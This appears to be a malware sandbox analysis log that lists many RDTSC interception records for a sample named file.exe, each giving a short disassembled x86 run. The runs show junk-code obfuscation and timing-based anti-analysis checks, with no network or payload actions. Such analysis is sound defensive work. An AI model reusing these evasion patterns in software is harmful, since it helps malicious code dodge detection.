Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FD1D3 second address: 15FD202 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push edi 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9CD8F21AFCh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FED74 second address: 15FED8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8E65995h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FED8D second address: 15FEDC4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9CD8F21B02h 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D3226h], ebx 0x00000015 push 00000000h 0x00000017 mov edi, 6E5F357Fh 0x0000001c push 00000000h 0x0000001e mov edi, ecx 0x00000020 push eax 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 jnp 00007F9CD8F21AF6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FF831 second address: 15FF8A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F9CD8E6598Ah 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F9CD8E65988h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a jmp 00007F9CD8E6598Bh 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007F9CD8E65988h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000018h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d add dword ptr [ebp+122D32CAh], edi 0x00000053 xchg eax, ebx 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 push esi 0x00000058 pop esi 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FF5EA second address: 15FF5EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FF5EF second address: 15FF5F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FF5F4 second address: 15FF5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1600FAE second address: 160101E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F9CD8E6598Bh 0x0000000d popad 0x0000000e popad 0x0000000f nop 0x00000010 and esi, dword ptr [ebp+1245BF96h] 0x00000016 mov di, bx 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c mov dword ptr [ebp+122D2E88h], eax 0x00000022 pop esi 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007F9CD8E65988h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 0000001Ah 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f mov esi, dword ptr [ebp+122D3282h] 0x00000045 adc esi, 081F3612h 0x0000004b xchg eax, ebx 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F9CD8E65994h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 160101E second address: 1601024 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1604473 second address: 1604487 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E6598Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 160229A second address: 16022A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F9CD8F21AF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1605533 second address: 1605537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1605537 second address: 160553B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16064E7 second address: 16064FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F9CD8E6598Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16064FA second address: 16064FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1605779 second address: 1605793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65996h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1605793 second address: 16057AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21AFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d jg 00007F9CD8F21AF6h 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16057AD second address: 16057B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16084F6 second address: 16084FB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16084FB second address: 160856E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F9CD8E65988h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D2C60h] 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007F9CD8E65988h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 0000001Dh 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 mov edi, dword ptr [ebp+122D2A98h] 0x0000004c jns 00007F9CD8E6598Ah 0x00000052 push 00000000h 0x00000054 and ebx, dword ptr [ebp+122D3A4Fh] 0x0000005a xchg eax, esi 0x0000005b push ecx 0x0000005c pushad 0x0000005d pushad 0x0000005e popad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16086B3 second address: 16086B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 160975D second address: 1609779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8E65998h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1609779 second address: 160977D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 160C4B8 second address: 160C4BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 160D411 second address: 160D45A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F9CD8F21AF8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 push 00000000h 0x00000025 sub dword ptr [ebp+122D396Ah], esi 0x0000002b push 00000000h 0x0000002d sub dword ptr [ebp+122D3401h], ebx 0x00000033 xchg eax, esi 0x00000034 jo 00007F9CD8F21B04h 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 160D45A second address: 160D45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1610571 second address: 1610575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16127D0 second address: 161280A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65994h 0x00000007 jnc 00007F9CD8E65999h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007F9CD8E65990h 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 160C78E second address: 160C792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 161068D second address: 1610698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9CD8E65986h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1612E2D second address: 1612E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 161074A second address: 161074F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1612E31 second address: 1612E35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1612E35 second address: 1612E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F9CD8E65988h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 cld 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007F9CD8E65988h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 adc bx, 5B3Fh 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d jc 00007F9CD8E65986h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1612E96 second address: 1612E9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1612E9A second address: 1612EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1612EA0 second address: 1612EA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1613E9A second address: 1613F0D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9CD8E65986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F9CD8E65988h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007F9CD8E65988h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 00000019h 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 jnc 00007F9CD8E6598Ch 0x0000004a push 00000000h 0x0000004c xor edi, dword ptr [ebp+122D2A30h] 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 push edx 0x00000057 pop edx 0x00000058 jp 00007F9CD8E65986h 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1614073 second address: 1614077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1614077 second address: 1614109 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9CD8E65992h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F9CD8E65988h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 push dword ptr fs:[00000000h] 0x00000030 cld 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 and bl, FFFFFFC3h 0x0000003b xor bl, 00000015h 0x0000003e mov eax, dword ptr [ebp+122D00CDh] 0x00000044 sbb bl, FFFFFFF4h 0x00000047 push FFFFFFFFh 0x00000049 adc di, B8FCh 0x0000004e nop 0x0000004f jnc 00007F9CD8E65998h 0x00000055 push eax 0x00000056 pushad 0x00000057 pushad 0x00000058 jmp 00007F9CD8E6598Ah 0x0000005d push ecx 0x0000005e pop ecx 0x0000005f popad 0x00000060 push eax 0x00000061 push edx 0x00000062 jnl 00007F9CD8E65986h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1616522 second address: 1616534 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jne 00007F9CD8F21AF6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1616534 second address: 1616538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1616538 second address: 161653C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1614FD0 second address: 1614FD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1650B1D second address: 1650B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C05BA second address: 15C05CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jns 00007F9CD8E6598Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C05CD second address: 15C05D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C05D3 second address: 15C05ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65996h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1653FC3 second address: 1653FDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9CD8F21AFEh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1653FDC second address: 1653FE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1653FE0 second address: 1653FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16543F0 second address: 16543F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16543F4 second address: 1654400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1654714 second address: 1654719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 165C295 second address: 165C29B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 165C29B second address: 165C2A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 165C2A1 second address: 165C2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 165C2A5 second address: 165C2A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 165CFFD second address: 165D00D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9CD8F21AFBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 165D00D second address: 165D013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1661998 second address: 16619CA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9CD8F21B09h 0x00000008 jmp 00007F9CD8F21B01h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1660DAD second address: 1660DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1660F5D second address: 1660F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1660F68 second address: 1660F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1660F6C second address: 1660F93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jp 00007F9CD8F21B3Ah 0x0000000d pushad 0x0000000e jmp 00007F9CD8F21B07h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1660F93 second address: 1660FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F9CD8E65986h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9CD8E6598Fh 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1661501 second address: 1661514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9CD8F21AFDh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1666521 second address: 1666525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1666525 second address: 166653B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21AFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166E573 second address: 166E578 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166C59D second address: 166C5A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166C5A3 second address: 166C5C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65997h 0x00000007 je 00007F9CD8E6598Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166C9FF second address: 166CA30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9CD8F21B05h 0x0000000d push edx 0x0000000e jmp 00007F9CD8F21B01h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166CA30 second address: 166CA35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166CA35 second address: 166CA3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F9CD8F21AF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166CB71 second address: 166CB86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65991h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166CB86 second address: 166CB99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9CD8F21AFAh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166CE42 second address: 166CE5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F9CD8E65986h 0x0000000a pop ebx 0x0000000b jmp 00007F9CD8E6598Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D022 second address: 166D026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D026 second address: 166D02A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D02A second address: 166D059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F9CD8F21AF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007F9CD8F21B13h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D059 second address: 166D05E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D1AF second address: 166D1B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D1B5 second address: 166D1C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65990h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D328 second address: 166D32E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D32E second address: 166D332 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D332 second address: 166D34C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9CD8F21AFEh 0x00000011 rdtsc
